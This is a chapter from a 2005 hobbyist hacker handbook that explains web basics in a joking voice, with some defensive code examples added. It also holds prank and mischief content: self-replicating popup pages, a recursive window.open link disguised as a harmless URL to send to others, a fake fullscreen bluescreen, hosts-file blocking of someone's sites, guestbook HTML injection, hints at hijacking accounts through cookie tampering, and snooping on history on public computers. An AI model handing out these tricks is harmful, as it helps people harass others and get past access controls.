the internet and deceit


the web is a complex, but interesting place.

to access your web browser, go to: start > all programs > internet explorer. this is the program bundled with windows that can be used to visit different web pages. when you type in a web address, a request is sent using the http (hypertext transfer protocol) protocol; there are many different types of protocols and each has its own use. a protocol is the agreed upon format that computers use to talk to each other (like a language). when an http request is sent, the request bounces from server to server until it reaches its destination, where your request is processed and a web page is sent back. a server is a computer set up to handle such requests, and you could turn your computer into a server if you wanted to host your own web pages, although most people prefer to pay a monthly fee to a third-party provider to "host" their web pages and e-mail for them in order to avoid learning the technical side of it.

the real cost of hosting comes with "bandwidth," which is the amount of data you can transfer in a given amount of time (whenever you request an image or web page, you're requesting data and using up bandwidth), and as a result, high-traffic web sites have very costly hosts. bandwidth goes both ways; you have an upload transfer limit as well: the big difference between a high-speed and dial-up connection. if you're using dial-up, you may think "i wouldn't use the internet any more on a high-speed connection than i already do" but what you don't understand is that once you switch, it's no longer a prescription drug where you stop by every once in a while to pick up your dosage, it's a freakin' i.v.

since dial-up users often get disconnected, software tools have been developed to save download progress, meaning if you're downloading a big file and lose your connection, you can resume where you left off rather than starting over. i'd tell you more but dial-up users suck and we don't care about them. we need speed! for pr0n!

one thing to watch out for on dial-up is dial-up hijacking, where your access number is changed to dial something long-distance, racking up your phone bill.

the address you type in to access a website is referred to as a "domain" or uri (universal resource identifier), which anybody can register for a yearly fee if the name you want is available, then you can configure the domain to point to your host or redirect to another website. if you want to reserve a domain for yourself, one of the most popular registrars is www.netsol.com, although cheaper alternatives are available. if the domain you want isn't available, you can at least see who owns it (a good place to find contact information for those obscure websites that don't like to be contacted). you actually have all of the tools you need to start building web pages on your computer already; we'll cover the basics. if you're interested in building web pages (it's fun stuff), you need to know html (hypertext markup language). html is the easiest, most basic language out there, and anybody even semi-techy knows it.

there are entire books on html that explain it in depth, and i will attempt to sum it up for you in a few paragraphs. i wasn't originally going to discuss the language, but it is critical for a 1337 h4x0r to know it like the back of their hand. html basically arranges the content of a web page, and decides how that content will look; the browser's job is to read the html code and render it as a web page. every tag in html has an opening tag and a closing tag, or is otherwise self-closing. whatever is in between the tags is affected, and tags can have optional "attributes" that further describe them. if i wanted to refer to myself as a geek i could type:

 <geek> tapeworm </geek> 

or:

 <geek name="tapeworm" /> 

although "geek" is not an actual tag, and you can't make tags up. html has several pre-defined tags and each has a special meaning. refer to the following table (this is not a complete list):

handy html

br = break/new line (self-closing)

hr = horizontal line (self-closing)

ol = ordered (numbered) list

ul = unordered (bulleted) list

li = list item

b = bold

u = underline

i = italic

s = strikethrough

marquee = scrolling text


not mentioned above; the "font" tag decides how text will look, and the "table" tag can be used to organize content within rectangular blocks with its two additional tags "tr" (table row) and "td" (table data/cell). to insert images you can use "img src" (image source), and for links "a href" (anchor hypertext reference). the list goes on… following is a very simple example of how a web page is constructed; you can save the code in notepad as an .html file and then open it to see how the browser renders the code. i encourage you to experiment with it.

 <html>
 <head><title>the title is up here</title></head>
 <body bgcolor="gray">
   <ul>
     <li>one</li>
     <li>two</li>
     <li>threeee</li>
   </ul>
   <hr />
   <table bgcolor="black" border="1" align="center" width="600" height="100%" cellpadding="5" cellspacing="5">
     <tr>
       <td bgcolor="#ff0000" align="right">
         <!-- this is a hidden comment, and the #ff0000 seen on the previous line is hex code for the color red -->
         <font face="comic sans ms" color="" size="13"> hello <b>th</b><u>e</u><s>re</s>.. </font>
       </td>
       <td>
         <marquee><font color="green">&lt;0wnz0rz&gt; tapeworm &lt;/0wnz0rz&gt;</font></marquee>
         <!-- the above tags are ways to represent "less than" and "greater than" or to print code examples without them being interpreted as html -->
       </td>
     </tr>
   </table>
   <a href="c:\temp\bluescreen.jpg">
     <img width="100" height="100" src="file:///c:/temp/bluescreen.jpg" alt="this looks familiar" />
     <br />click me</a>
 </body>
 </html>

at first glance this probably looks like a bunch of gibberish, but if you take the time to carefully read through it and refer to the previously mentioned table then you will see that everything has a meaning. if anybody tries to teach you "frames" just walk away; frames suck. overall html is a very forgiving and sloppy language, meaning you can make all sorts of mistakes and the browser will never tell you about errors. that should pretty much give you at least a vague idea of how it works; for a decent tutorial (which you should research) just visit www.htmlgoodies.com.

note

building web pages is great fun, so long as you don't get a case of the i-want-my-site-to-have-everythings.


you can right-click on any web page and select the option to "view source" and you can see all of the client-side code that makes up that web page (the server-side code is only available to the server). there are ways that web developers attempt to hide their client-side source code, but there is always a way to find it. it's the same with images: many developers don't want you to be able to save images or access them directly, but it's impossible to prevent. the more you research web development, the more you will understand how a web site is organized and how to find things in places you would have never thought to look before.

being able to view the client-side code allows you to see file paths and different values that are being sent back and forth. a good developer always verifies what data is sent from the client, but then some developers are lazy. by manipulating cookies (i'll get to cookies in a minute), client-side code, or uri information, you can sometimes do things that you're not supposed to. for example, you might be able to access directories of images and private content, hijack someone else's account, cheat online polls (voting systems), or unlock forum topics that have been restricted by the administrator. forums are very good places to get help with certain things as they usually revolve around a particular topic; they are especially popular in development communities to help each other with particular coding languages.
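the server-side check a good developer performs, as an added example that is not from the book: a forum reply handler that believes a hidden form field and a cookie, beside one that decides from its own records. the topic table, session ids and function names are made up for illustration.

```javascript
// added example, not from the book. all names and data are constructed.

// state that lives on the server and is never taken from the client
const TOPICS = new Map([[42, { title: 'forum rules', locked: true }]]);
const SESSIONS = new Map([
  ['sess-member', { user: 'tapeworm', role: 'member' }],
  ['sess-admin', { user: 'boss', role: 'admin' }],
]);

// lazy version: the page handed the browser a hidden "locked" field and a
// "role" cookie, and the handler believes whatever comes back.
function replyTrusting(req) {
  if (req.form.locked === 'true' && req.cookies.role !== 'admin') {
    return { status: 403, reason: 'topic locked' };
  }
  return { status: 200, reason: 'posted' };
}

// careful version: the client only names things (a session id, a topic id);
// who the user is and whether the topic is locked come from server records.
function replyVerified(req) {
  const session = SESSIONS.get(req.cookies.sid);
  if (!session) return { status: 401, reason: 'not logged in' };

  const topic = TOPICS.get(Number(req.form.topic));
  if (!topic) return { status: 404, reason: 'no such topic' };

  if (topic.locked && session.role !== 'admin') {
    return { status: 403, reason: 'topic locked' };
  }

  // the post body is client data too: check type and size before storing it
  const body = req.form.body;
  if (typeof body !== 'string' || body.trim() === '' || body.length > 2000) {
    return { status: 400, reason: 'bad post body' };
  }
  return { status: 200, reason: 'posted' };
}

// constructed request from a member whose hidden field and role cookie
// were edited in the browser before submitting
const TAMPERED = {
  cookies: { sid: 'sess-member', role: 'admin' },
  form: { topic: '42', locked: 'false', body: 'first!' },
};

console.log(replyTrusting(TAMPERED).status, replyVerified(TAMPERED).status);
```

the same rule covers polls and account pages: anything that arrives in a cookie, form field or uri is a claim to be checked, not a fact.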

some forums and guestbooks (especially those found on local band sites) allow you to use html in your posts, or perhaps their own variation of html known as bb (bulletin board) code. i find it incredibly hard to resist typing something as simple as "</table>" into some poor sap's guestbook, just to see if html is actually enabled and to laugh when it messes up their display.
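how a guestbook keeps a stray "</table>" from touching its layout, as an added example that is not from the book: every post is converted to the &lt; and &gt; entities shown in the sample page earlier, and only a short allow-list of bb codes is turned back into tags. the function names and the allow-list are assumptions made for illustration.

```javascript
// added example, not from the book. escapeHtml, renderPost and ALLOWED_BB
// are hypothetical names.

const ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// replace every character that has meaning in html with its entity, so the
// browser prints it instead of interpreting it
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// bb codes this board allows, mapped to tags from the "handy html" list
const ALLOWED_BB = { b: 'b', i: 'i', u: 'u', s: 's' };

// escape first, then translate only complete [x]...[/x] pairs from the
// allow-list. tags are always emitted as an open/close pair, and a visitor
// never gets to choose a tag name or an attribute.
function renderPost(raw) {
  let html = escapeHtml(raw);
  for (const [code, tag] of Object.entries(ALLOWED_BB)) {
    const pair = new RegExp(`\\[${code}\\]([\\s\\S]*?)\\[/${code}\\]`, 'gi');
    html = html.replace(pair, `<${tag}>$1</${tag}>`);
  }
  return html.replace(/\r?\n/g, '<br />');
}

// constructed guestbook posts
const SAMPLE_POSTS = [
  'great show last night!',
  '</table>',
  '[b]rock on[/b] <script>alert("lolz!")</script>',
  '[b]never closed',
];

function renderGuestbook(posts) {
  return posts.map((p) => `<li>${renderPost(p)}</li>`).join('\n');
}

console.log(renderGuestbook(SAMPLE_POSTS));
```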

one of the most popular attacks against websites is called a ddos (distributed denial of service), which more or less floods a server with fake traffic.

a common saying amongst developers is "don't reinvent the wheel," which means don't code something that has already been coded. developers share code all of the time to save each other hassles. the problem with a lot of different sites using the same code is that if the code isn't secure and a vulnerability becomes exposed, people could hop around taking advantage of every website that is using the code. what's worse is that it takes very little effort to look up known vulnerabilities, and this goes both ways; simply by visiting a website, it is possible that the server-side code could take advantage of a known vulnerability in your browser and manipulate your system. in a nutshell, the more you learn (whether it be web development, networking, etc) the safer you will be.

as easy as it is to build a web page, many people do so with the intentions of deceiving you. what if you received an e-mail from the government or some other seemingly legitimate company telling you to visit a website and verify financial information? this is known as "phishing." anyone can mask the "from" e-mail address to make it look like anything they want; i will show you how later. these e-mails and websites are made up to look official, even with official-looking domains and stolen logos. don't be a moron: no legitimate company or government is going to ask you for confidential information via e-mail without having you first login to a pre-existing secure account, and even the odds of that are extremely slim. the internet is not secure enough to store personal information, and nobody in their right mind should do it. fake websites aren't the only trick in the book either. with all of those servers your requests are being bounced through, it is very likely that somebody may be eavesdropping or watching your requests pass by. if you were submitting any type of confidential information such as placing an order, this could pose a problem. you more or less need to use your best judgment about the websites through which you transmit personal information. a good thing to look for before submitting anything is whether or not the page is using an https protocol; the "s" stands for secure but neither of the t's stand for trusted. you might want to check with a website prior to placing an order to make sure your financial information isn't going to be stored in an online database.

another important thing to understand about web pages is the difference between client-side and server-side. the client is your computer, while the server is the computer hosting the website. coding languages are written for both the client and the server but usually only one or the other. a client-side language is interpreted by your browser, while a server-side language is interpreted by the web server. every time you reload a page or submit a request, it goes to the server, but if you see something being updated on-the-fly without having to reload the page (such as a menu opening or a clock counting) then that is client-side functionality. unless, of course, you're connected through a java applet or sumthin.

the cool thing about having a server on your own computer is that it allows you to execute your server-side code without having to first login to a third-party host. this is especially useful to web developers, as you could build a fully functional database driven website offline. xp professional comes with the iis (internet information server) and apache (www.apache.org) is a free alternative.

a "cookie" is a client-side file that a web site can store on your computer to remember you; it stores information that you may have entered on the site (to save you from having to enter it again) or allows you to be automatically logged in when you come back. just because a website can store a cookie on your machine, or tell what operating system you're running, or find out your ip address, or know what size your screen resolution is, or tell you what browser you're using, it doesn't mean that it can access your computer files (because it can't). that is all just basic, public information used for statistics, convenience, and delivering a website optimized for your machine (a website has to be available to a large number of browsers and operating systems, and each renders code differently). statistical information gathered from websites is usually used to customize their advertisements or website according to what you like (by comparing ads to items you've looked at for example). otherwise, a website only has access to the information you give them. you can disable cookies but there really is no valid reason to do so unless you don't like people knowing what links you've clicked or you're on a public computer and don't want other people seeing where you've been. by the way, if you're ever on a public computer, see if you can look where other people have been :-)

double-click the "internet options" icon inside of your control panel. if you click the "settings" button in the section marked "temporary internet files" and then click the "view files" button, you can see every file that has been cached from web surfing. when you surf the internet, certain files are stored on your computer (in the cache) so that they not only load quicker the next time you visit the page, but also save the website bandwidth because you're not constantly re-downloading the same things from page to page. a website can prevent items from being cached if it wants to, to prevent you from snatching movies or the like (but it's a good place to look in the case of the lazy developer). this is clearly a good place to see where people have been, although an easier place to review past surfing is in the "history" folder, which can be found in c:\documents and settings\user name\local settings\. be sure to delete your temporary internet files (cookies included) and clear the history if you're paranoid about someone using a computer after you.

the setting for "home page" in your internet options is the website or file on your computer that automatically loads every time you open the browser. if you were to take the following code (which is a mix of html and javascript, both client-side languages), type it in notepad, save it in the temp folder we created earlier as an .html file, then set your homepage as file:///c:/temp/popuphell.html (assuming you named your file popuphell.html) then every time you opened a browser it would continue to open new browsers until the max has been reached. this is actually a really fun game to play: how quickly can you kill the popup windows?! if you have sp2 installed (a windows update), then ie has a built-in popup blocker that you may need to disable for this to work: just go to tools > pop-up blocker > turn off pop-up blocker or add it to your trusted sites as described below. with a little web design knowledge you could have a lot of fun with this one; get creative.

 <html> <body onload="window.open('file:///c:/temp/popuphell.html')"> <!-- pwn3d. --> </body> </html> 

if popup windows don't suit your fancy, how about some javascript alert boxes?

 <html>
 <body>
 <script language="javascript">
   alert("whhaassssuuuppp!!!");
   alert("lolz!");
   alert("i am totally 0wnz0ring you!");
   alert("u = boring.");
   alert("k's bai!");
 </script>
 </body>
 </html>

you can find free html and javascript code all over the place to do pretty much whatever you want.

another useful javascript code to create popup windows would be to create a link as follows:

 <a href="javascript:while(1){ w=window.open();d=w.document;d.open(); d.writeln('<script>while(1){ window.open()} </script>');d.close()} ">http://innocuous.looking.url/</a>

you could save this link in a file (popuphell2.html) or even send it over an instant message haha. again, sp2 is really weird with javascript; we'll talk a little more about it later.

an alternative to our bluescreen-screensaver:

 <html>
 <head>
 <script language="javascript">
   function fullscreen(url) {
     // second argument is the (empty) window name, third is the feature list
     window.open(url, '', 'fullscreen=yes,scrollbars=auto');
   }
 </script>
 </head>
 <body onload="fullscreen('path to our image')">
 </body>
 </html>

this basically opens ie in full screen mode, with the toolbars hidden. any image can be used, for example, an animated image of a windows bootup screen. people can rarely figure out how to get out of this one.

through the "view" option at the top of your browser you can somewhat customize the buttons and appearance. simply removing the address bar from display might be enough to screw with a newbie's head for a while.

in the "security" tab of your internet options, you can add trusted or restricted websites. it could be a little funny to block someone's favorite site, or a personal site you don't want family visiting. if they figure out how to re-enable it, there is another way you can re-block it :-) go to "c:\winnt\system32\drivers\etc" to find a file called "hosts." you can add ip (internet protocol) and web addresses to this file by editing it in notepad; there should already be an example in there to follow. entries added in this file redirect all requests to the ip 127.0.0.1 (the ip every computer uses to point to itself), essentially blocking those websites, or you can redirect the sites as well. for example, if you inserted "www.icodeviruses.com www.aol.com" it would redirect all requests for aol.com to my 1337 w3bp4g3. viruses might use the hosts file to block update sites that your anti-virus program would use to detect it.
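checking a hosts file for the tampering described above, as an added example that is not from the book: it parses each line as an ip address followed by one or more names, and reports names that are blocked (pointed at the machine itself), redirected to an outside ip, or on lines that are not valid entries at all. the sample file, the watch-list domain and the function names are constructed for illustration; the ipv6 test is deliberately loose.

```javascript
// added example, not from the book. SAMPLE_HOSTS, WATCHED_SUFFIXES and
// auditHosts are constructed / hypothetical.

const SAMPLE_HOSTS = [
  '# constructed sample, not taken from a real machine',
  '127.0.0.1       localhost',
  '127.0.0.1       update.av-vendor.example   # update site pointed at self',
  '203.0.113.7     www.bank.example www.shop.example',
  '::1             localhost',
  'www.icodeviruses.com www.aol.com',
].join('\n');

// assumption: domains your anti-virus or updater needs to reach
const WATCHED_SUFFIXES = ['av-vendor.example'];
const BENIGN_NAMES = new Set(['localhost', 'localhost.localdomain']);

function isIPv4(s) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(s);
  return m !== null && m.slice(1).every((octet) => Number(octet) <= 255);
}

// loose check: hex digits and colons only, with at least two colons
function isIPv6(s) {
  return /^[0-9a-f:]+$/i.test(s) && s.split(':').length >= 3;
}

// addresses that never leave the machine
function isLocal(addr) {
  return addr.startsWith('127.') || addr === '0.0.0.0' || addr === '::1';
}

function auditHosts(text, watched = WATCHED_SUFFIXES) {
  const findings = [];
  text.split(/\r?\n/).forEach((rawLine, idx) => {
    // drop the comment, then split the rest on whitespace
    const fields = rawLine.split('#')[0].trim().split(/\s+/).filter(Boolean);
    if (fields.length === 0) return; // blank or comment-only line
    const [address, ...names] = fields;
    const line = idx + 1;
    if (!isIPv4(address) && !isIPv6(address)) {
      // first field must be an ip; a hostname there is not a valid entry
      findings.push({ line, address, name: names.join(' '), finding: 'malformed' });
      return;
    }
    for (const name of names.map((n) => n.toLowerCase())) {
      if (BENIGN_NAMES.has(name) && isLocal(address)) continue;
      let finding = 'blocked';
      if (!isLocal(address)) {
        finding = 'redirected';
      } else if (watched.some((s) => name === s || name.endsWith('.' + s))) {
        finding = 'blocked-watched';
      }
      findings.push({ line, address, name, finding });
    }
  });
  return findings;
}

console.log(auditHosts(SAMPLE_HOSTS));
```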

think of an ip as a computer address: every computer has one and every ip is unique although ip's for personal computers can (and do often) change unless they are static. to get a website's ip address, just press win+r, type "cmd" to bring up the dos prompt, and then type "ping www.address.com" (or type "ipconfig" to get your own ip address). the ip will appear as four sets of numbers separated by periods. you can request a new ip by typing the following:

 ipconfig /release
 ipconfig /renew

then rebooting your computer.

ip's are used to communicate with other ip's, via the internet's basic communication language: tcp/ip (transmission control protocol), which was developed by the dod (department of defense). tcp handles data (or packets), while ip handles destination. even website addresses use ip's: the names that you type in your browser are simply masks for the website's ip (for convenience), which are converted by the dns (domain name system). all this ip and different protocol stuff can be pretty nauseating.

ip (version 4) is a 32-bit address space represented by a set of four numbers (ranging from 0 to 255) separated by periods; this allows for roughly 4 billion different addresses. that may sound like a lot, but there are fewer ip's with ipv4 than there are people in the world, which means sooner or later we're going to run out. to resolve this problem there is ipv6, which is a 128-bit address space, allowing for roughly 340 undecillion different addresses (that's 340 followed by 36 zeros). ipv4 hasn't died yet, but when it does, ip addresses will begin to look substantially different. ipv6 uses a hexadecimal representation rather than just decimal. hexadecimal is a combination of letters and numbers, revolving around multiplications of 16. if you take a 128-bit address in binary form, divide it into 16-bit boundaries, and convert each boundary into hexadecimal (or base 16) then you'll end up with an address that looks something like this (the future ip):

32fe:b1:1d4a:0:fe73:ee:2da:2b9a

xp has ipv6 support which you can experiment with, if u want. access in dos by typing ipv6/?.

if you access your "network connections" icon within your control panel, right-click your connection to select properties, highlight tcp/ip, and click the "properties" button, you can change the way it obtains an ip, essentially disabling someone's internet connection.

many networks, schools, etc love to block certain websites. there are many ways to access blocked sites. the easiest and probably most effective way to achieve this is through a free "proxy server," which you can find by searching the web. a proxy server is more or less a cache for an isp, so when you make a request for a website they will first check to see if a copy is stored in their proxy before searching the internet. by using a third-party proxy (once you find one, you can configure it within your internet options in the "connections" tab), rather than requesting the blocked page from the isp, you make a request to a server that's not blocked and ask that server to display the site for you. in other words, you bounce the request through another computer. proxy servers can also be used to somewhat anonymize your web surfing. if you don't have access to your internet options then you might try searching for a "web redirection" service as an alternative.

if you're using a router (allowing you to share your internet connection with several computers), then using "ipconfig" as mentioned above may not give you your outside ip (your ip as it appears to the rest of the world), but rather an ip associated with your local network. if this is the case, you can find your real ip several ways, an easy way is just to visit www.whatismyip.com.

ip addresses are distributed in blocks to different network providers or private companies, and then eventually assigned to you by your isp. think of a block as numbers 0.0.0.0 through 10.10.10.10. certain blocks are reserved, such as for local networks. for example, if you use a router, it will assign different ip's to each computer on your network (likely in the block 192.168.0.0-192.168.255.255), but you're still given an ip from your isp, through which the connection is then "routed" via the router to share the connection. you can look up an ip's "block owner" via either of the following addresses to report abuse or whatever (although these sites are mainly for u.s. based ip's):

www.arin.net/whois/

www.internic.net/whois.html

additionally, anything you don't understand about the web, just look up an rfc (request for comments) at rfc-editor.org and ietf.org.




Tapeworm - 1337 Hax or Handbook
Year: 2005
Pages: 74
